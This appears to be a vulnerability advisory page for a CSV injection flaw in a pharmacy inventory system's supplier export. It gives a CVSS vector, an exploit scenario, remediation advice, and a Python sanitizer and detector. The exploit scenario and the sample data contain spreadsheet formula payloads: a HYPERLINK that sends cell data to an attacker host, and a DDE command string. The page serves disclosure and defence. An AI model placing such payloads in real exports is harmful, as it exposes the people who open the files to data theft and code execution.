Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.
Analysis (AI)
CSV injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows high-privileged remote attackers to store spreadsheet formula payloads in the Address and Company Name fields of the Supplier Creation Interface; those values are later written unsanitized to the CSV produced by the export function. When a staff member opens that export in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the client evaluates the injected formulas on the staff member's workstation, enabling information disclosure, data manipulation, or further client-side exploitation. The server is not affected by the formula itself; the impact lands on whoever opens the file. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
| --- | --- |
| Exploitation | Exploitation requires the attacker to hold a high-privilege account (PR:H in the CVSS vector) on the SourceCodester Pharmacy Sales and Inventory System; it cannot be exploited unauthenticated or with low-privilege credentials. It also needs a second user to export the supplier list and open it in a spreadsheet client, since the injected formula is evaluated on that user's workstation, not on the server. … |
| Risk Assessment | The NVD CVSS 4.0 score of 4.7 (Medium) is consistent with the actual risk profile: the attacker already holds high privileges, the payload only runs on the workstation of whoever opens the export, and current Excel and LibreOffice Calc builds prompt before following DDE or external-data links. … |
| Exploit Scenario | A high-privileged attacker with valid application credentials opens the Supplier Creation Interface and creates or edits a supplier record, placing a payload such as `=HYPERLINK("http://attacker.com/?data="&A1,"Click")` or a DDE command string in the Company Name or Address field. A staff member later exports the supplier list via the /Export_csv/export endpoint and opens the file in Microsoft Excel, which treats the cell as a formula: the HYPERLINK variant sends the referenced cell contents to the attacker-controlled server once the victim clicks the link, and the DDE variant asks to start an external program. Both paths are gated by a user action or a security prompt in current spreadsheet builds, so the chain depends on the victim accepting it. … |
| Remediation | No vendor-released patch has been identified at time of analysis, and no patched version is referenced in any available advisory. The CVSS 4.0 vector carries no remediation-level metric (the v3 RL temporal metric was dropped in v4), so it says nothing about fix availability. Until a fix exists, neutralize formula triggers on export: prefix any field beginning with =, +, -, @, tab or carriage return with a single quote, quote every field, and treat exports built from user-supplied data as untrusted files. … |
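The export-side neutralization described in the Remediation row, together with a detector for the payload shapes in the Exploit Scenario row, as an added Python example. This is not code from this page or from the affected application (which is written in PHP); the supplier records, host name and function names are constructed for illustration.

```python
import csv
import io

# Leading characters that spreadsheet clients treat as the start of a
# formula (=, +, -, @) or as control characters some importers honour
# (tab, carriage return).  This is the OWASP CSV injection trigger list.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample supplier records (hypothetical, not from the affected
# application).  Rows 2 and 3 carry the two payload shapes the assessment
# describes; row 4 shows a formula hidden behind leading spaces.
SUPPLIERS = [
    {"company": "Acme Pharma Ltd", "address": "12 High Street"},
    {"company": '=HYPERLINK("http://attacker.example/?d="&A1,"Click")',
     "address": "5 Main Road"},
    {"company": "Smith, Jones & Co", "address": "=cmd|' /C calc'!A0"},
    {"company": "  =1+1", "address": "Unit 4"},
]


def is_formula_injection(value: str) -> bool:
    """True if a spreadsheet would evaluate `value` instead of showing text.

    The raw value and the value with leading spaces removed are both
    checked, because some importers trim whitespace before deciding.
    Negative numbers ("-5") are flagged as well; exempt known-numeric
    columns explicitly rather than weakening this check.
    """
    if value.startswith(FORMULA_TRIGGERS):
        return True
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_csv_cell(value: str) -> str:
    """Prefix a single quote so the client reads the cell as literal text.

    Embedded double quotes are doubled by the csv writer, so a value such
    as `"=1+1` cannot break out of the quoted, prefixed cell.
    """
    return "'" + value if is_formula_injection(value) else value


def export_csv(rows, neutralize: bool) -> str:
    """Render supplier rows as CSV text.

    neutralize=False reproduces the vulnerable behaviour (values written
    verbatim); neutralize=True is the hardened form.  Every field is
    quoted so embedded commas, quotes and newlines cannot add cells or rows.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["Company Name", "Address"])
    for r in rows:
        cells = [r["company"], r["address"]]
        if neutralize:
            cells = [neutralize_csv_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def scan_csv_for_formulas(text: str) -> list:
    """Detection side: (row, column) of every cell that would be evaluated
    as a formula.  Usable on exports already on disk, or as a regression
    test against the export endpoint."""
    hits = []
    for i, row in enumerate(csv.reader(io.StringIO(text))):
        for j, cell in enumerate(row):
            if is_formula_injection(cell):
                hits.append((i, j))
    return hits


if __name__ == "__main__":
    vulnerable = export_csv(SUPPLIERS, neutralize=False)
    hardened = export_csv(SUPPLIERS, neutralize=True)
    print("vulnerable export flags:", scan_csv_for_formulas(vulnerable))
    print("hardened export flags:  ", scan_csv_for_formulas(hardened))
    print(hardened)
```

The single-quote prefix is visible when the hardened file is opened from CSV (Excel only hides it for values typed into a cell), which is the accepted trade-off of the OWASP approach; a tab prefix hides better but is stripped by some importers, which is why it is not used here.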
External POC / Exploit Code
EUVD-2026-33623
GHSA-hpq4-4cqf-mcg8